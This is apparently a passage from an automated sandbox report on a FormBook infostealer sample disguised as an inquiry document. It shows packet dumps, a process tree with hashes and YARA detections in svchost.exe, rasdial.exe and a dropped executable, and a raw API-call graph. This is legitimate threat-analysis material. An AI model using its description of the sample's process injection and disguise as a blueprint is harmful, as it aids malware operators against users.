                                        Sep 3, 2024 13:55:51.697851896 CEST | 1236 | IN | Data Raw: 65 61 72 63 68 5f 5f 62 75 74 74 6f 6e 20 73 76 67 7b 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 32 34 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 32 34 70 78 3b 77 69 64 74 68 3a 31 2e 32 35 65 6d 3b 66 69 6c 6c 3a 63
                                        Data Ascii: earch__button svg{height:1.25em;min-height:24px;min-width:24px;width:1.25em;fill:currentColor;vertical-align:text-bottom}:where(.wp-block-search__button){border:1px solid #ccc;padding:6px 10px}.wp-block-search__inside-wrapper{display:flex;flex
                                        Sep 3, 2024 13:55:51.697866917 CEST | 1236 | IN | Data Raw: 65 6c 64 2d 68 69 64 64 65 6e 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 7b 62 6f 72 64 65 72 2d 6c 65 66 74 2d 77 69 64 74 68 3a 30 21 69 6d 70 6f 72 74 61 6e 74 3b 62 6f 72 64 65 72 2d 72 69 67 68 74 2d 77 69 64 74
                                        Data Ascii: eld-hidden .wp-block-search__input{border-left-width:0!important;border-right-width:0!important;flex-basis:0;flex-grow:0;margin:0;min-width:0!important;padding-left:0!important;padding-right:0!important;width:0!important}:where(.wp-block-searc
                                        Sep 3, 2024 13:55:51.702735901 CEST | 1236 | IN | Data Raw: 77 72 61 70 3a 77 72 61 70 21 69 6d 70 6f 72 74 61 6e 74 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 37 38 32 70 78 29 7b 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 7b 66 6c 65 78 2d 77 72 61 70 3a 6e 6f 77 72 61 70 21 69 6d
                                        Data Ascii: wrap:wrap!important}@media (min-width:782px){.wp-block-columns{flex-wrap:nowrap!important}}.wp-block-columns.are-vertically-aligned-top{align-items:flex-start}.wp-block-columns.are-vertically-aligned-center{align-items:center}.wp-block-columns



                                        Target ID:0
                                        Start time:07:52:45
                                        Start date:03/09/2024
                                        Path:C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
                                        Imagebase:0xdf0000
                                        File size:1'163'264 bytes
                                        MD5 hash:F295444B03C418B35DCB676ED284E846
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:1
                                        Start time:07:52:46
                                        Start date:03/09/2024
                                        Path:C:\Windows\SysWOW64\svchost.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\20-EM-00- PI-INQ-3001.exe"
                                        Imagebase:0x710000
                                        File size:46'504 bytes
                                        MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1995783454.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1999466002.0000000003690000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2000267559.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:07:53:11
                                        Start date:03/09/2024
                                        Path:C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files (x86)\sdqcjamjODQmCdJzxsIgJZBRMsjxhAMbDQEWuzYLMzYhr\eVmdoPPWSZoVOB.exe"
                                        Imagebase:0x3f0000
                                        File size:140'800 bytes
                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3531540694.0000000002A70000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3531712346.0000000002C70000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:6
                                        Start time:07:53:12
                                        Start date:03/09/2024
                                        Path:C:\Windows\SysWOW64\rasdial.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\SysWOW64\rasdial.exe"
                                        Imagebase:0x120000
                                        File size:19'456 bytes
                                        MD5 hash:A280B0F42A83064C41CFFDC1CD35136E
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3531407103.0000000004690000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3530888049.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3531433817.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:7
                                        Start time:07:53:36
                                        Start date:03/09/2024
                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                        Imagebase:0x7ff6bf500000
                                        File size:676'768 bytes
                                        MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true


                                          Execution Graph

                                          Execution Coverage:4.3%
                                          Dynamic/Decrypted Code Coverage:0.4%
                                          Signature Coverage:7.2%
                                          Total number of Nodes:2000
                                          Total number of Limit Nodes:156
                                          execution_graph: interactive call-graph edge list (node ids, function addresses starting at df107d, and API-call labels) rendered only by the report viewer; not reproducible as text.
97668 e4f769 97663->97668 97664->97581 97664->97583 97667->97664 97683 df7a24 61 API calls 97667->97683 97668->97664 97684 df7a24 61 API calls 97668->97684 97670 df79ba 97669->97670 97671 df7a17 97669->97671 97670->97671 97673 df79c5 97670->97673 97672 df7e8c 59 API calls 97671->97672 97678 df79e8 _memmove 97672->97678 97674 e2ef32 97673->97674 97675 df79e0 97673->97675 97676 df8189 59 API calls 97674->97676 97685 df8087 59 API calls Mailbox 97675->97685 97679 e2ef3c 97676->97679 97678->97587 97680 e10ff6 Mailbox 59 API calls 97679->97680 97681 e2ef5c 97680->97681 97682->97586 97683->97667 97684->97668 97685->97678 97686->97603 97687->97612 97689 df92c9 Mailbox 97688->97689 97690 e2f5c8 97689->97690 97695 df92d3 97689->97695 97691 e10ff6 Mailbox 59 API calls 97690->97691 97692 e2f5d4 97691->97692 97693 df92da 97693->97616 97694 df9df0 Mailbox 59 API calls 97694->97695 97695->97693 97695->97694 97696->97623 97697->97641 97698->97636 97699->97636 97700->97636 97702 df81ba 97701->97702 97703 df81b2 97701->97703 97702->97657 97710 df80d7 59 API calls 2 library calls 97703->97710 97706 df8e3c Mailbox 97705->97706 97707 df92c0 Mailbox 59 API calls 97706->97707 97708 df8e47 97706->97708 97707->97708 97708->97657 97709->97657 97710->97702 97712 df9a2b 97711->97712 97712->97454 97732 e4dc20 97713->97732 97716 e4dab1 CoCreateInstance 97717 e4daee 97716->97717 97718 e4dacf 97716->97718 97717->97718 97719 e4daf9 SetErrorMode GetProcAddress 97717->97719 97718->97468 97720 e4db18 97719->97720 97723 e4db1f 97719->97723 97737 e4dd22 GetModuleFileNameW LoadTypeLibEx RegisterTypeLib RegisterTypeLibForUser 97720->97737 97722 e4db8d SetErrorMode 97722->97718 97723->97722 97724->97502 97725->97482 97726->97492 97727->97485 97728->97490 97729->97503 97730->97490 97731->97467 97738 e47652 97732->97738 97735 e4dc50 IIDFromString 97736 e4daa9 97735->97736 97736->97716 97736->97718 97737->97723 97739 e47667 97738->97739 97740 e4766d CLSIDFromProgID 97738->97740 97739->97740 97741 e476b0 
CLSIDFromString 97740->97741 97742 e4767b 97740->97742 97743 e476bc 97741->97743 97742->97743 97744 e4767f ProgIDFromCLSID 97742->97744 97743->97735 97743->97736 97744->97743 97745 e47694 lstrcmpiW 97744->97745 97746 e476a5 CoTaskMemFree 97745->97746 97747 e476a2 97745->97747 97746->97743 97747->97746 97748 df1016 97753 df4ad2 97748->97753 97751 e12f80 __cinit 67 API calls 97752 df1025 97751->97752 97754 e10ff6 Mailbox 59 API calls 97753->97754 97755 df4ada 97754->97755 97756 df101b 97755->97756 97760 df4a94 97755->97760 97756->97751 97761 df4a9d 97760->97761 97762 df4aaf 97760->97762 97763 e12f80 __cinit 67 API calls 97761->97763 97764 df4afe 97762->97764 97763->97762 97765 df77c7 59 API calls 97764->97765 97766 df4b16 GetVersionExW 97765->97766 97767 df7d2c 59 API calls 97766->97767 97768 df4b59 97767->97768 97769 df7e8c 59 API calls 97768->97769 97780 df4b86 97768->97780 97770 df4b7a 97769->97770 97771 df7886 59 API calls 97770->97771 97771->97780 97772 df4bf1 GetCurrentProcess IsWow64Process 97774 df4c0a 97772->97774 97773 e2dc8d 97775 df4c89 GetSystemInfo 97774->97775 97776 df4c20 97774->97776 97777 df4c56 97775->97777 97788 df4c95 97776->97788 97777->97756 97780->97772 97780->97773 97781 df4c7d GetSystemInfo 97783 df4c47 97781->97783 97782 df4c32 97784 df4c95 2 API calls 97782->97784 97783->97777 97785 df4c4d FreeLibrary 97783->97785 97786 df4c3a GetNativeSystemInfo 97784->97786 97785->97777 97786->97783 97789 df4c2e 97788->97789 97790 df4c9e LoadLibraryA 97788->97790 97789->97781 97789->97782 97790->97789 97791 df4caf GetProcAddress 97790->97791 97791->97789 97792 df1055 97797 df2649 97792->97797 97795 e12f80 __cinit 67 API calls 97796 df1064 97795->97796 97798 df77c7 59 API calls 97797->97798 97799 df26b7 97798->97799 97804 df3582 97799->97804 97802 df2754 97803 df105a 97802->97803 97807 df3416 59 API calls 2 library calls 97802->97807 97803->97795 97808 df35b0 97804->97808 97807->97802 97809 df35a1 97808->97809 97810 df35bd 97808->97810 97809->97802 
97810->97809 97811 df35c4 RegOpenKeyExW 97810->97811 97811->97809 97812 df35de RegQueryValueExW 97811->97812 97813 df35ff 97812->97813 97814 df3614 RegCloseKey 97812->97814 97813->97814 97814->97809 97815 df3633 97816 df366a 97815->97816 97817 df3688 97816->97817 97818 df36e7 97816->97818 97853 df36e5 97816->97853 97822 df375d PostQuitMessage 97817->97822 97823 df3695 97817->97823 97820 df36ed 97818->97820 97821 e2d31c 97818->97821 97819 df36ca DefWindowProcW 97857 df36d8 97819->97857 97827 df3715 SetTimer RegisterWindowMessageW 97820->97827 97828 df36f2 97820->97828 97871 e011d0 10 API calls Mailbox 97821->97871 97822->97857 97824 e2d38f 97823->97824 97825 df36a0 97823->97825 97886 e52a16 71 API calls _memset 97824->97886 97829 df36a8 97825->97829 97830 df3767 97825->97830 97831 df373e CreatePopupMenu 97827->97831 97827->97857 97834 df36f9 KillTimer 97828->97834 97835 e2d2bf 97828->97835 97836 e2d374 97829->97836 97837 df36b3 97829->97837 97860 df4531 97830->97860 97831->97857 97833 e2d343 97872 e011f3 341 API calls Mailbox 97833->97872 97867 df44cb Shell_NotifyIconW _memset 97834->97867 97841 e2d2c4 97835->97841 97842 e2d2f8 MoveWindow 97835->97842 97836->97819 97885 e4817e 59 API calls Mailbox 97836->97885 97844 df374b 97837->97844 97849 df36be 97837->97849 97838 e2d3a1 97838->97819 97838->97857 97845 e2d2e7 SetFocus 97841->97845 97846 e2d2c8 97841->97846 97842->97857 97869 df45df 81 API calls _memset 97844->97869 97845->97857 97846->97849 97850 e2d2d1 97846->97850 97847 df370c 97868 df3114 DeleteObject DestroyWindow Mailbox 97847->97868 97849->97819 97873 df44cb Shell_NotifyIconW _memset 97849->97873 97870 e011d0 10 API calls Mailbox 97850->97870 97853->97819 97854 df375b 97854->97857 97858 e2d368 97874 df43db 97858->97874 97861 df45ca 97860->97861 97862 df4548 _memset 97860->97862 97861->97857 97887 df410d 97862->97887 97864 df45b3 KillTimer SetTimer 97864->97861 97865 df456f 97865->97864 97866 e2d6c0 Shell_NotifyIconW 97865->97866 97866->97864 97867->97847 
97868->97857 97869->97854 97870->97857 97871->97833 97872->97849 97873->97858 97875 df4406 _memset 97874->97875 97930 df4213 97875->97930 97878 df448b 97880 df44a5 Shell_NotifyIconW 97878->97880 97881 df44c1 Shell_NotifyIconW 97878->97881 97882 df44b3 97880->97882 97881->97882 97883 df410d 61 API calls 97882->97883 97884 df44ba 97883->97884 97884->97853 97885->97853 97886->97838 97888 df4129 97887->97888 97889 df4200 Mailbox 97887->97889 97909 df7b76 97888->97909 97889->97865 97892 df4144 97894 df7d2c 59 API calls 97892->97894 97893 e2d5dd LoadStringW 97896 e2d5f7 97893->97896 97895 df4159 97894->97895 97895->97896 97897 df416a 97895->97897 97898 df7c8e 59 API calls 97896->97898 97899 df4205 97897->97899 97900 df4174 97897->97900 97903 e2d601 97898->97903 97901 df81a7 59 API calls 97899->97901 97914 df7c8e 97900->97914 97906 df417e _memset _wcscpy 97901->97906 97904 df7e0b 59 API calls 97903->97904 97903->97906 97905 e2d623 97904->97905 97907 df7e0b 59 API calls 97905->97907 97908 df41e6 Shell_NotifyIconW 97906->97908 97907->97906 97908->97889 97910 e10ff6 Mailbox 59 API calls 97909->97910 97911 df7b9b 97910->97911 97912 df8189 59 API calls 97911->97912 97913 df4137 97912->97913 97913->97892 97913->97893 97915 e2f094 97914->97915 97916 df7ca0 97914->97916 97929 e48123 59 API calls _memmove 97915->97929 97923 df7bb1 97916->97923 97919 df7cac 97919->97906 97920 e2f09e 97921 df81a7 59 API calls 97920->97921 97922 e2f0a6 Mailbox 97921->97922 97924 df7bbf 97923->97924 97928 df7be5 _memmove 97923->97928 97925 e10ff6 Mailbox 59 API calls 97924->97925 97924->97928 97926 df7c34 97925->97926 97927 e10ff6 Mailbox 59 API calls 97926->97927 97927->97928 97928->97919 97929->97920 97931 df4227 97930->97931 97932 e2d638 97930->97932 97931->97878 97934 e53226 62 API calls _W_store_winword 97931->97934 97932->97931 97933 e2d641 DestroyIcon 97932->97933 97933->97931 97934->97878 97935 e3220e GetTempPathW 97936 e3222b 97935->97936 97937 ff23b0 97951 ff0000 97937->97951 97939 ff244d 
97954 ff22a0 97939->97954 97957 ff3470 GetPEB 97951->97957 97953 ff068b 97953->97939 97955 ff22a9 Sleep 97954->97955 97956 ff22b7 97955->97956 97958 ff349a 97957->97958 97958->97953 97959 dfb56e 97966 e0fb84 97959->97966 97961 dfb584 97975 dfc707 97961->97975 97963 dfb5ac 97965 dfa4e8 97963->97965 97987 e5a0b5 89 API calls 4 library calls 97963->97987 97967 e0fb90 97966->97967 97968 e0fba2 97966->97968 97969 df9e9c 60 API calls 97967->97969 97970 e0fbd1 97968->97970 97971 e0fba8 97968->97971 97974 e0fb9a 97969->97974 97973 df9e9c 60 API calls 97970->97973 97972 e10ff6 Mailbox 59 API calls 97971->97972 97972->97974 97973->97974 97974->97961 97976 df7b76 59 API calls 97975->97976 97977 dfc72c _wcscmp 97975->97977 97976->97977 97978 df7f41 59 API calls 97977->97978 97981 dfc760 Mailbox 97977->97981 97979 e31abb 97978->97979 97980 df7c8e 59 API calls 97979->97980 97982 e31ac6 97980->97982 97981->97963 97988 df859a 68 API calls 97982->97988 97984 e31ad7 97985 df9e9c 60 API calls 97984->97985 97986 e31adb Mailbox 97984->97986 97985->97986 97986->97963 97987->97965 97988->97984 97989 e17e93 97990 e17e9f __mtinitlocknum 97989->97990 98026 e1a048 GetStartupInfoW 97990->98026 97992 e17ea4 98028 e18dbc GetProcessHeap 97992->98028 97994 e17efc 97995 e17f07 97994->97995 98111 e17fe3 58 API calls 3 library calls 97994->98111 98029 e19d26 97995->98029 97998 e17f0d 97999 e17f18 __RTC_Initialize 97998->97999 98112 e17fe3 58 API calls 3 library calls 97998->98112 98050 e1d812 97999->98050 98002 e17f27 98003 e17f33 GetCommandLineW 98002->98003 98113 e17fe3 58 API calls 3 library calls 98002->98113 98069 e25173 GetEnvironmentStringsW 98003->98069 98006 e17f32 98006->98003 98009 e17f4d 98010 e17f58 98009->98010 98114 e132f5 58 API calls 3 library calls 98009->98114 98079 e24fa8 98010->98079 98013 e17f5e 98014 e17f69 98013->98014 98115 e132f5 58 API calls 3 library calls 98013->98115 98093 e1332f 98014->98093 98017 e17f71 98018 e17f7c __wwincmdln 98017->98018 98116 e132f5 58 API calls 3 
library calls 98017->98116 98099 df492e 98018->98099 98021 e17f90 98022 e17f9f 98021->98022 98117 e13598 58 API calls _doexit 98021->98117 98118 e13320 58 API calls _doexit 98022->98118 98025 e17fa4 __mtinitlocknum 98027 e1a05e 98026->98027 98027->97992 98028->97994 98119 e133c7 36 API calls 2 library calls 98029->98119 98031 e19d2b 98120 e19f7c InitializeCriticalSectionAndSpinCount __mtinitlocknum 98031->98120 98033 e19d34 98121 e19d9c 61 API calls 2 library calls 98033->98121 98034 e19d30 98034->98033 98122 e19fca TlsAlloc 98034->98122 98037 e19d39 98037->97998 98038 e19d46 98038->98033 98039 e19d51 98038->98039 98123 e18a15 98039->98123 98042 e19d93 98131 e19d9c 61 API calls 2 library calls 98042->98131 98045 e19d72 98045->98042 98047 e19d78 98045->98047 98046 e19d98 98046->97998 98130 e19c73 58 API calls 4 library calls 98047->98130 98049 e19d80 GetCurrentThreadId 98049->97998 98051 e1d81e __mtinitlocknum 98050->98051 98052 e19e4b __lock 58 API calls 98051->98052 98053 e1d825 98052->98053 98054 e18a15 __calloc_crt 58 API calls 98053->98054 98056 e1d836 98054->98056 98055 e1d8a1 GetStartupInfoW 98063 e1d8b6 98055->98063 98065 e1d9e5 98055->98065 98056->98055 98057 e1d841 __mtinitlocknum @_EH4_CallFilterFunc@8 98056->98057 98057->98002 98058 e1daad 98145 e1dabd LeaveCriticalSection _doexit 98058->98145 98060 e18a15 __calloc_crt 58 API calls 98060->98063 98061 e1da32 GetStdHandle 98061->98065 98062 e1da45 GetFileType 98062->98065 98063->98060 98063->98065 98067 e1d904 98063->98067 98064 e1d938 GetFileType 98064->98067 98065->98058 98065->98061 98065->98062 98144 e1a06b InitializeCriticalSectionAndSpinCount 98065->98144 98067->98064 98067->98065 98143 e1a06b InitializeCriticalSectionAndSpinCount 98067->98143 98070 e25184 98069->98070 98071 e17f43 98069->98071 98146 e18a5d 58 API calls 2 library calls 98070->98146 98075 e24d6b GetModuleFileNameW 98071->98075 98073 e251c0 FreeEnvironmentStringsW 98073->98071 98074 e251aa _memmove 98074->98073 98076 e24d9f 
_wparse_cmdline 98075->98076 98078 e24ddf _wparse_cmdline 98076->98078 98147 e18a5d 58 API calls 2 library calls 98076->98147 98078->98009 98080 e24fc1 __wsetenvp 98079->98080 98081 e24fb9 98079->98081 98082 e18a15 __calloc_crt 58 API calls 98080->98082 98081->98013 98087 e24fea __wsetenvp 98082->98087 98083 e25041 98084 e12f95 _free 58 API calls 98083->98084 98084->98081 98085 e18a15 __calloc_crt 58 API calls 98085->98087 98086 e25066 98088 e12f95 _free 58 API calls 98086->98088 98087->98081 98087->98083 98087->98085 98087->98086 98090 e2507d 98087->98090 98148 e24857 58 API calls strtoxl 98087->98148 98088->98081 98149 e19006 IsProcessorFeaturePresent 98090->98149 98092 e25089 98092->98013 98094 e1333b __IsNonwritableInCurrentImage 98093->98094 98172 e1a711 98094->98172 98096 e13359 __initterm_e 98097 e12f80 __cinit 67 API calls 98096->98097 98098 e13378 _doexit __IsNonwritableInCurrentImage 98096->98098 98097->98098 98098->98017 98100 df4948 98099->98100 98110 df49e7 98099->98110 98101 df4982 IsThemeActive 98100->98101 98175 e135ac 98101->98175 98105 df49ae 98187 df4a5b SystemParametersInfoW SystemParametersInfoW 98105->98187 98107 df49ba 98188 df3b4c 98107->98188 98109 df49c2 SystemParametersInfoW 98109->98110 98110->98021 98111->97995 98112->97999 98113->98006 98117->98022 98118->98025 98119->98031 98120->98034 98121->98037 98122->98038 98124 e18a1c 98123->98124 98126 e18a57 98124->98126 98128 e18a3a 98124->98128 98132 e25446 98124->98132 98126->98042 98129 e1a026 TlsSetValue 98126->98129 98128->98124 98128->98126 98140 e1a372 Sleep 98128->98140 98129->98045 98130->98049 98131->98046 98133 e25451 98132->98133 98135 e2546c 98132->98135 98134 e2545d 98133->98134 98133->98135 98141 e18d68 58 API calls __getptd_noexit 98134->98141 98136 e2547c RtlAllocateHeap 98135->98136 98138 e25462 98135->98138 98142 e135e1 DecodePointer 98135->98142 98136->98135 98136->98138 98138->98124 98140->98128 98141->98138 98142->98135 98143->98067 98144->98065 98145->98057 98146->98074 
98147->98078 98148->98087 98150 e19011 98149->98150 98155 e18e99 98150->98155 98154 e1902c 98154->98092 98156 e18eb3 _memset ___raise_securityfailure 98155->98156 98157 e18ed3 IsDebuggerPresent 98156->98157 98163 e1a395 SetUnhandledExceptionFilter UnhandledExceptionFilter 98157->98163 98160 e18fba 98162 e1a380 GetCurrentProcess TerminateProcess 98160->98162 98161 e18f97 ___raise_securityfailure 98164 e1c836 98161->98164 98162->98154 98163->98161 98165 e1c840 IsProcessorFeaturePresent 98164->98165 98166 e1c83e 98164->98166 98168 e25b5a 98165->98168 98166->98160 98171 e25b09 5 API calls ___raise_securityfailure 98168->98171 98170 e25c3d 98170->98160 98171->98170 98173 e1a714 EncodePointer 98172->98173 98173->98173 98174 e1a72e 98173->98174 98174->98096 98176 e19e4b __lock 58 API calls 98175->98176 98177 e135b7 DecodePointer EncodePointer 98176->98177 98240 e19fb5 LeaveCriticalSection 98177->98240 98179 df49a7 98180 e13614 98179->98180 98181 e13638 98180->98181 98182 e1361e 98180->98182 98181->98105 98182->98181 98241 e18d68 58 API calls __getptd_noexit 98182->98241 98184 e13628 98242 e18ff6 9 API calls strtoxl 98184->98242 98186 e13633 98186->98105 98187->98107 98189 df3b59 __write_nolock 98188->98189 98190 df77c7 59 API calls 98189->98190 98191 df3b63 GetCurrentDirectoryW 98190->98191 98243 df3778 98191->98243 98193 df3b8c IsDebuggerPresent 98194 df3b9a 98193->98194 98195 e2d4ad MessageBoxA 98193->98195 98196 df3c73 98194->98196 98198 e2d4c7 98194->98198 98199 df3bb7 98194->98199 98195->98198 98197 df3c7a SetCurrentDirectoryW 98196->98197 98201 df3c87 Mailbox 98197->98201 98442 df7373 59 API calls Mailbox 98198->98442 98324 df73e5 98199->98324 98201->98109 98203 e2d4d7 98208 e2d4ed SetCurrentDirectoryW 98203->98208 98205 df3bd5 GetFullPathNameW 98206 df7d2c 59 API calls 98205->98206 98207 df3c10 98206->98207 98340 e00a8d 98207->98340 98208->98201 98211 df3c2e 98212 df3c38 98211->98212 98443 e54c03 AllocateAndInitializeSid CheckTokenMembership FreeSid 98211->98443 
98356 df3a58 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 98212->98356 98216 e2d50a 98216->98212 98218 e2d51b 98216->98218 98220 df4864 61 API calls 98218->98220 98219 df3c42 98221 df3c55 98219->98221 98224 df43db 68 API calls 98219->98224 98223 e2d523 98220->98223 98364 e00b30 98221->98364 98226 df7f41 59 API calls 98223->98226 98224->98221 98227 e2d530 98226->98227 98229 e2d53a 98227->98229 98230 e2d55f 98227->98230 98232 df7e0b 59 API calls 98229->98232 98231 df7e0b 59 API calls 98230->98231 98234 e2d55b GetForegroundWindow ShellExecuteW 98231->98234 98233 e2d545 98232->98233 98235 df7c8e 59 API calls 98233->98235 98238 e2d58f Mailbox 98234->98238 98238->98196 98240->98179 98241->98184 98242->98186 98244 df77c7 59 API calls 98243->98244 98245 df378e 98244->98245 98444 df3d43 98245->98444 98247 df37ac 98248 df4864 61 API calls 98247->98248 98249 df37c0 98248->98249 98250 df7f41 59 API calls 98249->98250 98251 df37cd 98250->98251 98458 df4f3d 98251->98458 98254 df37ee Mailbox 98259 df81a7 59 API calls 98254->98259 98255 e2d3ae 98514 e597e5 98255->98514 98258 e2d3cd 98261 e12f95 _free 58 API calls 98258->98261 98262 df3801 98259->98262 98263 e2d3da 98261->98263 98482 df93ea 98262->98482 98265 df4faa 84 API calls 98263->98265 98267 e2d3e3 98265->98267 98271 df3ee2 59 API calls 98267->98271 98268 df7f41 59 API calls 98269 df381a 98268->98269 98485 df8620 98269->98485 98273 e2d3fe 98271->98273 98272 df382c Mailbox 98274 df7f41 59 API calls 98272->98274 98275 df3ee2 59 API calls 98273->98275 98276 df3852 98274->98276 98277 e2d41a 98275->98277 98278 df8620 69 API calls 98276->98278 98279 df4864 61 API calls 98277->98279 98281 df3861 Mailbox 98278->98281 98280 e2d43f 98279->98280 98282 df3ee2 59 API calls 98280->98282 98284 df77c7 59 API calls 98281->98284 98283 e2d44b 98282->98283 98285 df81a7 59 API calls 98283->98285 98286 df387f 98284->98286 98287 e2d459 98285->98287 98489 df3ee2 98286->98489 98289 df3ee2 59 API calls 98287->98289 98291 e2d468 
98289->98291 98297 df81a7 59 API calls 98291->98297 98293 df3899 98293->98267 98294 df38a3 98293->98294 98295 e1313d _W_store_winword 60 API calls 98294->98295 98296 df38ae 98295->98296 98296->98273 98298 df38b8 98296->98298 98299 e2d48a 98297->98299 98300 e1313d _W_store_winword 60 API calls 98298->98300 98301 df3ee2 59 API calls 98299->98301 98302 df38c3 98300->98302 98303 e2d497 98301->98303 98302->98277 98304 df38cd 98302->98304 98303->98303 98305 e1313d _W_store_winword 60 API calls 98304->98305 98306 df38d8 98305->98306 98306->98291 98307 df3919 98306->98307 98309 df3ee2 59 API calls 98306->98309 98307->98291 98308 df3926 98307->98308 98310 df942e 59 API calls 98308->98310 98311 df38fc 98309->98311 98312 df3936 98310->98312 98313 df81a7 59 API calls 98311->98313 98314 df91b0 59 API calls 98312->98314 98315 df390a 98313->98315 98316 df3944 98314->98316 98317 df3ee2 59 API calls 98315->98317 98505 df9040 98316->98505 98317->98307 98319 df93ea 59 API calls 98321 df3961 98319->98321 98320 df9040 60 API calls 98320->98321 98321->98319 98321->98320 98322 df3ee2 59 API calls 98321->98322 98323 df39a7 Mailbox 98321->98323 98322->98321 98323->98193 98325 df73f2 __write_nolock 98324->98325 98326 df740b 98325->98326 98327 e2ee4b _memset 98325->98327 98328 df48ae 60 API calls 98326->98328 98329 e2ee67 GetOpenFileNameW 98327->98329 98330 df7414 98328->98330 98332 e2eeb6 98329->98332 99359 e109d5 98330->99359 98334 df7d2c 59 API calls 98332->98334 98336 e2eecb 98334->98336 98336->98336 98337 df7429 99377 df69ca 98337->99377 98341 e00a9a __write_nolock 98340->98341 99605 df6ee0 98341->99605 98343 e00a9f 98355 df3c26 98343->98355 99616 e012fe 89 API calls 98343->99616 98345 e00aac 98345->98355 99617 e04047 91 API calls Mailbox 98345->99617 98347 e00ab5 98348 e00ab9 GetFullPathNameW 98347->98348 98347->98355 98349 df7d2c 59 API calls 98348->98349 98350 e00ae5 98349->98350 98351 df7d2c 59 API calls 98350->98351 98352 e00af2 98351->98352 98353 e350d5 _wcscat 98352->98353 98354 
